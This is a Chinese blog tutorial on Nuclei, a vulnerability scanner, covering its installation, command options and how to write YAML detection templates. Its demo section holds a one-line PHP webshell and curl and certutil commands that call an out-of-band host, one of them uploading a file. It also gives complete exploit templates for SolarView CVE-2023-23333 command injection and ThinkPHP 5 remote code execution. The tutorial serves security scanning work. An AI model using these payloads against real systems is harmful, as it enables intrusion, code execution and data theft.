红队专题
招募六边形战士队员
一起学习 代码审计、安全开发、web攻防、逆向等。。。
私信联系
简介
Nuclei 国外的一款快速扫描工具,内置大量的漏洞库
官网:https://nuclei.projectdiscovery.io
Nuclei项目地址 https://github.com/projectdiscovery/nuclei
https://github.com/ExpLangcn/NucleiTP/tree/main/TPALL
一款基于YAML语法模板的开发的定制化快速漏洞扫描器
使用Go语言开发,具有很强的可配置性、可扩展性和易用性。
TCP、DNS、HTTP、SSL、 TCP 、 文件支持、Whois、Websocket、Headless 等
完全可配置的模板
大规模扫描
基于带外的检测
轻松编写自己的模板
用于基于模板跨目标发送请求,从而实现零误报并提供对大量主机的快
速扫描。
Nuclei还有一个专门的存储库,其中包含由300 多名安全研究人员和工程师
贡献的各种类型的漏洞模板。
Nuclei-Templates项目地址:https://github.com/projectdiscovery/nuclei-templates
linux系统:/home/当前用户/nuclei-templates;
windows系统:C:\Users\用户\ nuclei-templates
安装
使用二进制文件(推荐)
https://github.com/projectdiscovery/nuclei
nuclei_2.6.0_linux_arm64.zip 下载解压上传到服务器中
wget https://github.com/projectdiscovery/nuclei/releases/download/v2.6.0/nuclei_2.6.0_linux_amd64.zip
unzip nuclei_2.6.0_linux_amd64.zip
kali一键安装
apt install nuclei
常用语法
nuclei.exe -l "cnm.txt" -t "cnm.yaml" -o "cnmres.txt" -s high,critical -stats -debug
nuclei -h
这将显示Nuclei的帮助,以下是所有支持的命令【以最新版为主】
用法:
nuclei [命令]
命令:
目标:
-u, -target string[] 指定扫描的URL/主机
-l, -list string 指定需要扫描的URL/主机文件(一行一个)
模板:
-t, -templates string[] 指定需要扫描的模板或者模板的路径
-nt, -new-templates 只扫描最新版本中添加的模板
-w, -workflows string[] 指定扫描中的工作流或者工作流目录
-validate 验证通过的模板
-tl 列出所有可用的模板
过滤:
-tags string[] 执行有标记的模板子集
-etags, -exclude-tags string[] 执行标记为排除的模板
-itags, -include-tags string[] 不执行具有攻击性的模板
-et, -exclude-templates string[] 要排除的模板或者模板目录
-it, -include-templates string[] 执行默认或配置中排除的模板
-s, -severity value[] 根据严重性运行模板,允许的值有:info,low,medium,high,critical
-es, -exclude-severity value[] 根据严重性排除模板,允许的值有:info,low,medium,high,critical
-a, -author string[] 执行指定作者的模板
输出:
-o, -output string 输出发现的问题到文件
-silent 只显示结果
-nc, -no-color 禁用输出内容着色(ANSI转义码)
-json 输出为jsonL(ines)
-irr, -include-rr 在JSONL中输出对应的请求和相应(仅结果)
-nm, -no-meta 不显示匹配的元数据
-nts, -no-timestamp 不在输出中显示时间戳
-rdb, -report-db string 本地的Nuclei结果数据库(始终使用该数据库保存结果)
-me, -markdown-export string 以markdown导出结果
-se, -sarif-export string 以SARIF导出结果
配置:
-config string 指定Nuclei的配置文件
-rc, -report-config string 指定Nuclei报告模板文件
-H, -header string[] 指定报告中的标题:value格式
-V, -var value 通过var=value指定var值
-r, -resolvers string 指定Nuclei的解析文件
-sr, -system-resolvers 当DNS错误时使用系统DNS
-passive 启用被动扫描处理HTTP响应
-ev, env-vars 在模板中使用环境变量
交互:
-inserver, -ineractsh-server string 使用interactsh反连检测平台(默认为"https://interact.sh")
-itoken, -interactsh-token string 指定反连检测平台的身份凭证
-interactions-cache-size int 指定保存在交互缓存中的请求数(默认:5000)
-interactions-eviction int 聪缓存中删除请求前等待的时间(默认为60秒)
-interactions-poll-duration int 每个轮询前等待时间(默认为5秒)
-interactions-cooldown-period int 退出轮询前的等待时间(默认为5秒)
-ni, -no-interactsh 禁用反连检测平台,同时排除基于反连检测的模板
限速:
-r1, -rate-limit int 每秒最大请求量(默认:150)
-rlm, -rate-limit-minute int 每分钟最大请求量
-bs, -bulk-size int 每个模板最大并行检测数(默认:25)
-c, -concurrency int 并行执行的最大模板数量(默认:25)
优化:
-timeout int 超时时间(默认为5秒)
-retries int 重试次数(默认:1)
-mhe, -max-host-error int 某主机扫描失败次数,跳过该主机(默认:30)
-project 使用项目文件夹避免多次发送同一请求
-project-path string 设置特定的项目文件夹
-spm, -stop-at-first-path 得到一个结果后停止(或许会中断模板和工作流的逻辑)
-stream 流模式 - 在不整理输入的情况下详细描述
无界面浏览器:
-headless 启用需要无界面浏览器的模板
-page-timeout int 在无界面下超时秒数(默认:20)
-sb, -show-brower 在无界面浏览器运行模板时,显示浏览器
-sc, -system-chrome 不使用Nuclei自带的浏览器,使用本地浏览器
调试:
-debug 显示所有请求和响应
-debug-req 显示所有请求
-debug-resp 显示所有响应
-proxy, -proxy-url string 使用HTTP代理
-proxy-socks-url string 使用SOCK5代理
-tlog, -trace-log string 写入请求日志到文件
-version 显示版本信息
-v, -verbose 显示详细信息
-vv 显示额外的详细信息
-tv, -templates-version 显示已安装的模板版本
升级:
-update 更新Nuclei到最新版本
-ut, -update-templates 更新Nuclei模板到最新版
-ud, -update-directory string 覆盖安装模板
-duc, -disable-update-check 禁用更新
统计:
-stats 显示正在扫描的统计信息
-sj, -stats-json 将统计信息以JSONL格式输出到文件
-si, -stats-inerval int 显示统计信息更新的间隔秒数(默认:5)
-m, -metrics 显示Nuclei端口信息
-mp, -metrics-port int 更改Nuclei默认端口(默认:9092)
YAML /ˈjæməl/
尾音类似camel骆驼
YAML是"YAML Ain’t a Markup Language"(YAML不是一种标记语言)的递归缩写。
在开发的这种语言时,YAML 的意思其实是:“Yet Another Markup Language”(仍是一种标记语言),
但为了强调这种语言以数据做为中心,而不是以标记语言为重点,而用反向缩略语重命名。
YAML 是一种可读性高,数据序列化格式语言,通常用于编写配置文件。
YAML参考了其他多种语言,
包括:C语言、Python、Perl,并从XML、电子邮件的数据格式(RFC 2822)中获得灵感。
Clark Evans在2001年首次发表了这种语言,
另外Ingy döt Net与Oren Ben-Kiki也是这语言的共同设计者。
当前已经有数种编程语言或脚本语言支持(或者说解析)这种语言。
基本语法规则
大小写敏感
使用缩进表示层级关系
缩进时不允许使用 Tab 键,只允许使用空格。
缩进的空格数目不重要,只要相同层级的元素左侧对齐即可
YAML 支持的有三种。
数据结构
对象:键值对的集合,使用冒号结构表示。
数组:一组按次序排列的值,又称为序列(sequence) / 列表(list)。
一组连词线开头的行,构成一个数组。
如果数据结构的子成员是一个数组,则可以在该项下面缩进一个空格。
纯量(scalars):单个的、不可再分的值,如字符串、整数、布尔值等。
更新Nuclei
使用nuclei -update命令来将您的Nuclei更新到最新版本。
使用nuclei -update-templates命令来将您的核心模板nuclei-templates更新到最新版本,
另外Nuclei本身每24小时也会进行一次自动更新。
POC YAML 语法模板编写
基本框架
id: str
# 模版的唯一ID,必要字段。
info: k: v
# 漏洞信息字段,包含漏洞名称、作者、漏洞严重性、漏洞描述、引用连接、评分、漏洞标签等,基本都是可选字段。
variables: k: v
#(可选值) 全局变量,值可以是一个字符串或者一个表达式,可选字段
requests: []
# 定义的 HTTP 请求(核心部分),并对返回任用进行匹配,然后确定目标是否存在漏洞
模板参数
id
每一个模板都有一个id,这个id是必选参数,也必须是唯一的不能重复,并且所有的templates都必须以.yaml结尾
id: CVE-2023-23333
其中id 内容中不得包含空格,否则解析将会失败
info
就是Information的简写,包含了模板的信息,name, author, severity, description, reference, tags 等
info:
name: SolarView任意文件下载
#脚本的名字
author:Nacl
#作者
severity:high
#安全级别 可选的有 info, low, medium, high, critical, unknown
description: Contec SolarView Compact是日本Contec公司的一个应用系统。提供光伏发电测量系统。攻击者利用该漏洞通过downloader.php绕过内部限制来执行命令。|
# 描述,加个|可以进行换行
reference:
- https://mp.weixin.qq.com/s/nXJ3tLIpDvYmnejy_NSmzQ
# 链接来源,参考链接
tags: cve,cve2023,solarview,rce
# 标签,nuclei可以根据标签来打poc
ps: 创建模板时必须包含 id, name, authors severity,否则模板将无法运行!!!
requests
requests 的语法如下,它的每个元素都包含单/多个 HTTP 请求、payloads(可选)、匹配规则、解压规则(可选)。
大多数情况下定义一个就足够了。
定义 http 请求支持两种方式,
1、直接提供 http 原始请求
2、分别定义 method、path、headers、body 等;
requests:
# 也可以写作 http:
# 方式一:原始(raw)请求
- raw:
- |
GET /index.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
- |
POST /index.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept-Language: en
Content-type: application/x-www-form-urlencoded
...
# 方式二:GET, POST, PUT, DELETE 请求
- method: GET
path:
- "{{BaseURL}}/login.php"
- "{{BaseURL}}/index.php"
headers:
User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
cmd: "test123"
请求中会包含 {{变量名或表达式}}的动态值,
变量命名由 variables、payloads、extractors 解压出来的值、目标url等一起提供
比如:验证token的正确性
variables
variables:
token:"ABCDEFG"
requests:
- raw:
# 此请求将被发送到https://api.target.com:443来验证令牌
- |
@Host: https://api.target.com:443
GET /api/key={{token}} HTTP/1.1
Host: api.target.com:443
matchers:
- type: word
part: body
words:
- valid token
payloads
下面这个demo用于爆破目录,稍微改改也能实现根据用户名爆破密码
http:
- raw:
- |+
GET /{{path}} HTTP/1.1
Host: {{Hostname}}
Referer: {{BaseURL}}
attack: batteringram
payloads:
path: path_wordlist.txt
unsafe: true
pipeline: true # 启用了HTTP 管道,允许在同一连接上发送多个 HTTP 请求
pipeline-concurrent-connections: 40
pipeline-requests-per-connection: 25000
matchers:
- type: status
part: header
status:
- 200
extractors
适用于匹配的值会动态变化
requests:
- raw:
# 此请求将被发送到{{Hostname}}以获取令牌
- |
GET /getkey HTTP/1.1
Host: {{Hostname}}
# 此请求将被发送到https://api.target.com:443来验证令牌
- |
@Host: https://api.target.com:443
GET /api/key={{token}} HTTP/1.1
Host: api.target.com:443
extractors:
- type: regex
name: token
part: body
internal: true # 动态变量 避免在终端中打印提取的值
regex:
# 根据前缀和后缀用正则来提取动态的token
- 'prefix(.*)suffix'
matchers:
- type: word
part: body
words:
- valid token
extractors 的匹配方式还能细化
1、regex,正则提取;
将提取的api 通过POST 请求 发送到 127.0.0.1:801(@Host)
requests:
- raw:
- |
GET /index.html HTTP/1.1
Host:{{Hostname}}
User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
Accept: "123"
- |
@Host: http://127.0.0.1:801
POST / HTTP/1.1
Host:{{Hostname}}
User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
Accept: ""
{{api}}
extractors:
- type: regex
name: api
part: body
internal: true
#group: 0
regex:
- "([a-z0-9]{32})"
2、kval,value/key=value,比如提取指定响应头;
extractors:
- type: kval
kval:
- content_type # 从http响应头中提取content_type所对应的值
3、json,使用 jq 的语法提取 json 数据;
jq 是个非常强大的处理JSON 数据的命令行工具
jq详细参考:jq 常用操作
extractors:
- type: json # type of the extractor
part: body
name: user
json:
- '.[] | .id' # jq 提取语法
例如:
4、xpath,使用 xpath 提取 html 响应数据;
XPath 是一种 路径表达式 ,可以根据xpath节点路径匹配相应的内容
个人感觉这个配合headless 很适用
extractors:
- type: xpath # type of the extractor
attribute: href # attribute value to extract (optional)
xpath:
- "/html/body/div/p[2]/a" # xpath value for extraction
5、dsl,使用表达式提取。
extractors:
- type: dsl
dsl:
- "len(body)" # body长度
matchers
1、status,匹配 http 响应状态码;
matchers:
- type: status
status: #状态码之间默认是or的关系
- 200
- 302
condition: and #将默认的 or 的关系改为 and
2、size,匹配长度,如 Conteng-Length;
用到的情况不多,一般都有更优的选择
3、word,字符串匹配;
matchers:
- type: word
words:
- "[core]"
- "[config]"
condition: and
part: body
4、regex,正则匹配;
matchers:
- type: regex
part: body
regex:
- 'SSH\-([0-9.-A-Za-z_ ]+)'
5、binary,二进制数据匹配;
matchers:
- type: binary
binary:
- "504B0304" # zip格式
- "526172211A070100" # RAR格式
- "FD377A585A0000" # xz tar.xz 格式
condition: or
part: body
6、dsl,使用表达式进行匹配;
matchers:
- type: dsl
dsl:
- "len(body)<1024 && status_code==200" # 状态码为200,body长度小于1024
- "contains(toupper(body), md5(cookie))" # 检查md5之后的cookie在不在全部转为大写的body中
matchers-condition
规则之间是OR还是AND
matchers-condition: and # or
matchers:
# 对响应 headers 进行字符串匹配
- type: word
part: header
words:
- "ADMINCONSOLESESSION"
# 对响应 body 进行字符串匹配,且要包含所有子串。
- type: word
part: body
words:
- 'uid='
- 'gid='
- 'groups='
condition: and
# 匹配 http 响应状态码
- type: status
status:
- 200
匹配时间
可以拿来写 时间盲注的poc
matchers:
- type: dsl
dsl:
- 'duration>=6' #持续时间 6或大于6秒 返回true
匹配大小
matchers:
- type: dsl
dsl:
- "len(body)<130 && status_code==200"
保留字
{{BaseURL}} - 这将在请求的运行时替换为目标文件中指定的输入 URL。
{{RootURL}} - 这将在运行时将请求中的根 URL 替换为目标文件中指定的根 URL。
{{Hostname}} - 主机名变量被替换为主机名,包括运行时目标的端口。
{{Host}} - 这将在运行时替换目标文件中指定的输入主机的请求。
{{Port}} - 这将在请求中的运行时替换为目标文件中指定的输入端口。
{{Path}} - 这将在请求中的运行时替换为目标文件中指定的输入路径。
{{File}} - 这将在请求中的运行时替换为目标文件中指定的输入文件名。
{{Scheme}} - 这将在运行时按目标文件中指定的协议替换模板中的请求。
Variable Value
{{BaseURL}} https://example.com:443/foo/bar.php
{{RootURL}} https://example.com:443
{{Hostname}} example.com:443
{{Host}} example.com
{{Port}} 443
{{Path}} /foo
{{File}} bar.php
{{Scheme}} https
Helper functions
目的是为了适应多种环境下的poc书写
id: helper-functions-examples
info:
name: RAW Template with Helper Functions
author: pdteam
severity: info
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
01: {{base64("Hello")}}
02: {{base64(1234)}}
03: {{base64_decode("SGVsbG8=")}}
04: {{base64_py("Hello")}}
05: {{contains("Hello", "lo")}}
06: {{generate_java_gadget("commons-collections3.1", "wget http://{{interactsh-url}}", "base64")}}
07: {{gzip("Hello")}}
08: {{hex_decode("6161")}}
09: {{hex_encode("aa")}}
10: {{html_escape("<body>test</body>")}}
11: {{html_unescape("<body>test</body>")}}
12: {{len("Hello")}}
13: {{len(5555)}}
14: {{md5("Hello")}}
15: {{md5(1234)}}
16: {{mmh3("Hello")}}
17: {{print_debug(1+2, "Hello")}}
18: {{rand_base(5, "abc")}}
19: {{rand_base(5)}}
20: {{rand_char("abc")}}
21: {{rand_char()}}
22: {{rand_int(1, 10)}}
23: {{rand_int(10)}}
24: {{rand_int()}}
25: {{rand_text_alpha(10, "abc")}}
26: {{rand_text_alpha(10)}}
27: {{rand_text_alphanumeric(10, "ab12")}}
28: {{rand_text_alphanumeric(10)}}
29: {{rand_text_numeric(10, 123)}}
30: {{rand_text_numeric(10)}}
31: {{regex("H([a-z]+)o", "Hello")}}
32: {{remove_bad_chars("abcd", "bc")}}
33: {{repeat("../", 5)}}
34: {{replace("Hello", "He", "Ha")}}
35: {{replace_regex("He123llo", "(\\d+)", "")}}
36: {{reverse("abc")}}
37: {{sha1("Hello")}}
38: {{sha256("Hello")}}
39: {{to_lower("HELLO")}}
40: {{to_upper("hello")}}
41: {{trim("aaaHelloddd", "ad")}}
42: {{trim_left("aaaHelloddd", "ad")}}
43: {{trim_prefix("aaHelloaa", "aa")}}
44: {{trim_right("aaaHelloddd", "ad")}}
45: {{trim_space(" Hello ")}}
46: {{trim_suffix("aaHelloaa", "aa")}}
47: {{unix_time(10)}}
48: {{url_decode("https:%2F%2Fprojectdiscovery.io%3Ftest=1")}}
49: {{url_encode("https://projectdiscovery.io/test?a=1")}}
50: {{wait_for(1)}}
常用demo
支持使用 interact.sh API 内置自动请求关联来实现基于 OOB 的漏洞扫描
最常用的验证无回显漏洞
比如 log4j、无回显命令执行、无回显SSRF等
无回显:
1.php
<?php exec($_POST[1]);?>
yaml
requests:
- raw:
- |
POST /1.php HTTP/1.1
Host:{{Hostname}}
User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
Content-type: application/x-www-form-urlencoded
1=curl https://{{interactsh-url}};
matchers:
- type: word
part: interactsh_protocol # 确认是否进行了http请求
words:
- "http"
requests:
- raw:
- |
POST /1.php HTTP/1.1
Host:{{Hostname}}
User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
Content-type: application/x-www-form-urlencoded
1=curl https://{{interactsh-url}}/ -F "file=@/flag"
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # HTTP 模式
words:
- "http"
- type: word #同样可以用正则
part: interactsh_request # 在 request请求匹配 flag{
words:
- "flag{"
匹配到的request的结果,可以用 -debug调出来
linux
curl https://{{interactsh-url}}
windows
certutil.exe -urlcache -split -f https://{{interactsh-url}} 1.txt
skip-variables-check
请求内容里包含 {{ }}时,会被 nuclei 解析为变量,加这个就是告诉nuclei不要解析.
requests:
- method: GET
path:
- "{{BaseURL}}"
headers:
Cookie: "cmd={{shell_exec('id')}}; "
skip-variables-check: true # nuclei不要解析
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "uid="
part: body
回显
windows 回显
cmd.exe /c set /a 12333*32111
396024963
linux 回显
expr 12333 \* 32111
396024963
完整exp参考
CVE-2023-23333.yaml
id: CVE-2023-23333
info:
name: SolarView Compact 6.00 - OS Command Injection
author: Mr-xn
severity: critical
description: |
SolarView Compact 6.00 was discovered to contain a command injection vulnerability, attackers can execute commands by bypassing internal restrictions through downloader.php.
reference:
- https://github.com/Timorlover/CVE-2023-23333
- https://github.com/Mr-xn/CVE-2023-23333
- https://nvd.nist.gov/vuln/detail/CVE-2023-23333
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-23333
cwe-id: CWE-77
epss-score: 0.95016
metadata:
max-request: 1
verified: true
shodan-query: http.html:"SolarView Compact"
fofa-query: body="SolarView Compact" && title="Top"
tags: cve,cve2023,solarview,rce
variables:
cmd: "echo+CVE-2023-23333|rev"
http:
- raw:
- |
@timeout: 25s
GET /downloader.php?file=%3B{{cmd}}%00.zip HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- '33332-3202-EVC'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
thinkphp-5022-rce.yaml
id: thinkphp-5022-rce
info:
name: ThinkPHP - Remote Code Execution
author: dr_set
severity: critical
description: ThinkPHP 5.0.22 and 5.1.29 are susceptible to remote code execution if the website doesn't have mandatory routing enabled, which is the default setting. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/5-rce
tags: thinkphp,rce
metadata:
max-request: 1
http:
- method: GET
path:
- "{{BaseURL}}?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1"
matchers-condition: and
matchers:
- type: word
words:
- "PHP Extension"
- "PHP Version"
- "ThinkPHP"
condition: and
- type: status
status:
- 200
参考链接
nuclei poc模板编写笔记(二)
https://blog.csdn.net/qq_41315957/article/details/126594670
【渗透工具】Nuclei工具编写POC中文指南
https://mp.weixin.qq.com/s/bBGBDSU_ahktAMraHvhRHw
561
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
